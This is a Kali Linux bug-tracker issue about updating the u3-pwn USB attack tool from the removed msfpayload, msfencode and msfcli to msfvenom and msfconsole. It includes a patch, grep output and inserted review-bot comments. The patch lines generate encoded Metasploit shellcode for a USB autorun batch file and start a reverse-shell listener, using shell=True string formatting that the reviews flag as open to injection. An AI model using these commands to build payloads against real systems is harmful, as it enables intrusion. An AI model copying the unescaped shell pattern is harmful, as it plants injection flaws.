View Issue Details

ID: 0002326
Project: Kali Linux
Category: Kali Package Bug
View Status: public
Last Update: 2015-07-31 06:41
Reporter: g0tmi1k
Assigned To: rhertzog
Priority: normal
Severity: minor
Reproducibility: have not tried
Status: resolved
Resolution: fixed
Product Version: 2.0
Fixed in Version: 2.0
Summary: 0002326: u3-pwn v2.0 & Msfpayload/Msfencode
Description

Msfencode & msfpayload are no longer in Metasploit.
More information: https://community.rapid7.com/community/metasploit/blog/2015/06/08/msfpayload-and-msfencode-are-being-removed-from-metasploit

u3-pwn still calls both tools (see the grep output below), so it will break with the next metasploit package update.

root@kali ~$ cd u3-pwn-2.0                                                                                                                                                      
root@kali ~/u3-pwn-2.0$ ls                                                                                                                                                      
backup  debian  Required  resource  src  u3-pwn.py
root@kali ~/u3-pwn-2.0$ grep -R msfpayload                                                                                                                                      
src/generator.py:                subprocess.Popen('msfpayload %s EXITFUNC=thread  LHOST=%s LPORT=%s R  | msfencode -c 2 -e %s -t raw  | msfencode  -a x86 -e  x86/alpha_mixed -t raw BufferRegister=EAX > resource/payload.txt' % (shellcode[payload-1], addr, port,  encoders[encode-1] ), stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True).wait()
root@kali ~/u3-pwn-2.0$ grep -R msfencode                                                                                                                                       
src/generator.py:                subprocess.Popen('msfpayload %s EXITFUNC=thread  LHOST=%s LPORT=%s R  | msfencode -c 2 -e %s -t raw  | msfencode  -a x86 -e  x86/alpha_mixed -t raw BufferRegister=EAX > resource/payload.txt' % (shellcode[payload-1], addr, port,  encoders[encode-1] ), stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True).wait()
root@kali ~/u3-pwn-2.0$
Attached Files
msfvenom.patch (1,539 bytes)   
--- src/generator.py	2015-06-16 12:54:31.336510552 +0100
+++ src/generator.py	2015-06-16 12:58:46.936549581 +0100
@@ -219,7 +219,7 @@
 	   if port is not socket.inet_aton(port):
 		banner.print_banner()
                 print ' Generating Shellcode Please Wait...'
-                subprocess.Popen('msfpayload %s EXITFUNC=thread  LHOST=%s LPORT=%s R  | msfencode -c 2 -e %s -t raw  | msfencode  -a x86 -e  x86/alpha_mixed -t raw BufferRegister=EAX > resource/payload.txt' % (shellcode[payload-1], addr, port,  encoders[encode-1] ), stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True).wait()
+                subprocess.Popen('msfvenom -p %s EXITFUNC=thread LHOST=%s LPORT=%s -f raw -i 2 -e %s -f raw -a x86 -e x86/alpha_mixed -f raw BufferRegister=EAX --platform Windows -o resource/payload.txt' % (shellcode[payload-1], addr, port, encoders[encode-1]), stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True).wait()
                 alpha = open('resource/payload.txt', 'r')
                 text = alpha.readline()
                 file = open('resource/LaunchU3.bat', 'w')
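Review bot: The replacement `msfvenom` line still builds one string with `%` and runs it with `shell=True`, so `addr`, `port` and the list-selected names reach the shell unescaped and any metacharacter in them is interpreted as shell syntax. Where those values come from is outside the hunk, but the context line `if port is not socket.inet_aton(port):` is an identity comparison that looks always true, so it does not appear to validate anything. Pass an argument list instead (`subprocess.Popen(argv).wait()` without `shell=True`) after checking `port` with `int(port)` and `addr` with `socket.inet_aton(addr)` in a try/except. The result of `.wait()` is also discarded and neither pipe is read, so a failed run is silent and the following `open('resource/payload.txt', 'r')` can read a stale or missing file; a check such as `if proc.wait() != 0:` with an error message would catch that. The same pattern appears in the second hunk and in the copy of the patch quoted in note ~0003404; the enclosing function starts and ends outside the hunk.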
@@ -258,7 +258,7 @@
 
     if listener == 'yes' or listener == 'y':
 	banner.print_banner()
-        subprocess.Popen('msfcli exploit/multi/handler PAYLOAD=%s LHOST=0.0.0.0 LPORT=%s E' % (shellcode[payload-1], port), shell=True).wait()
+        subprocess.Popen('msfconsole -x \'use exploit/multi/handler;set PAYLOAD %s;set LHOST 0.0.0.0;set LPORT %s;exploit\'' % (shellcode[payload-1], port), shell=True).wait()
 
     else:
 	  banner.print_banner()
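Review bot: The `-x` argument wraps the formatted values in shell single quotes, and the console command string uses `;` as its separator, so a quote or semicolon in `port` changes either the shell command or the list of console commands; dropping `shell=True` alone does not remove the second case. Restrict `port` to an integer before formatting, e.g. `port = str(int(port))`, and pass `['msfconsole', '-x', commands]` as a list. The escaped `\'` inside a single-quoted Python literal is also hard to read; a double-quoted literal avoids the backslashes. The `if listener == ...` block continues outside the hunk.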

Activities

g0tmi1k

2015-06-11 15:59

administrator   ~0003399

There's also msfcli - https://github.com/rapid7/metasploit-framework/issues/3802

root@kali:~/u3-pwn-2.0# grep -R msfcli .
./src/generator.py:        subprocess.Popen('msfcli exploit/multi/handler PAYLOAD=%s LHOST=0.0.0.0 LPORT=%s E' % (shellcode[payload-1], port), shell=True).wait()
root@kali:~/u3-pwn-2.0# 
g0tmi1k

2015-06-16 12:04

administrator   ~0003404

Patch to fix it

Warning: the patched file mixes tabs and spaces for indentation.

--- src/generator.py    2015-06-16 12:54:31.336510552 +0100
+++ src/generator.py    2015-06-16 12:58:46.936549581 +0100
@@ -219,7 +219,7 @@
       if port is not socket.inet_aton(port):
        banner.print_banner()
                 print ' Generating Shellcode Please Wait...'
-                subprocess.Popen('msfpayload %s EXITFUNC=thread  LHOST=%s LPORT=%s R  | msfencode -c 2 -e %s -t raw  | msfencode  -a x86 -e  x86/alpha_mixed -t raw BufferRegister=EAX > resource/payload.txt' % (shellcode[payload-1], addr, port,  encoders[encode-1] ), stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True).wait()
+                subprocess.Popen('msfvenom -p %s EXITFUNC=thread LHOST=%s LPORT=%s -f raw -i 2 -e %s -f raw -a x86 -e x86/alpha_mixed -f raw BufferRegister=EAX --platform Windows -o resource/payload.txt' % (shellcode[payload-1], addr, port, encoders[encode-1]), stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True).wait()
                 alpha = open('resource/payload.txt', 'r')
                 text = alpha.readline()
                 file = open('resource/LaunchU3.bat', 'w')
@@ -258,7 +258,7 @@

     if listener == 'yes' or listener == 'y':
    banner.print_banner()
-        subprocess.Popen('msfcli exploit/multi/handler PAYLOAD=%s LHOST=0.0.0.0 LPORT=%s E' % (shellcode[payload-1], port), shell=True).wait()
+        subprocess.Popen('msfconsole -x \'use exploit/multi/handler;set PAYLOAD %s;set LHOST 0.0.0.0;set LPORT %s;exploit\'' % (shellcode[payload-1], port), shell=True).wait()

     else:
      banner.print_banner()

Proof

root@kali:~/u3-pwn-2.0# patch < msfvenom.patch 
can't find file to patch at input line 3
Perhaps you should have used the -p or --strip option?
The text leading up to this was:
--------------------------
|--- src/generator.py   2015-06-16 12:54:31.336510552 +0100
|+++ src/generator.py   2015-06-16 12:58:46.936549581 +0100
--------------------------
File to patch: src/generator.py
patching file src/generator.py
root@kali:~/u3-pwn-2.0#
rhertzog

2015-07-28 21:01

administrator   ~0003623

Fixed in u3-pwn 2.0-1kali3. Please test.

g0tmi1k

2015-07-31 06:41

administrator   ~0003644

Confirmed fixed.

Issue History

Date Modified Username Field Change
2015-06-11 15:52 g0tmi1k New Issue
2015-06-11 15:59 g0tmi1k Note Added: 0003399
2015-06-16 12:04 g0tmi1k Note Added: 0003404
2015-06-16 12:05 g0tmi1k File Added: msfvenom.patch
2015-07-27 10:30 g0tmi1k Product Version => 2.0
2015-07-27 14:42 rhertzog Assigned To => rhertzog
2015-07-27 14:42 rhertzog Status new => assigned
2015-07-28 21:01 rhertzog Note Added: 0003623
2015-07-28 21:01 rhertzog Status assigned => resolved
2015-07-28 21:01 rhertzog Fixed in Version => 2.0
2015-07-28 21:01 rhertzog Resolution open => fixed
2015-07-31 06:41 g0tmi1k Note Added: 0003644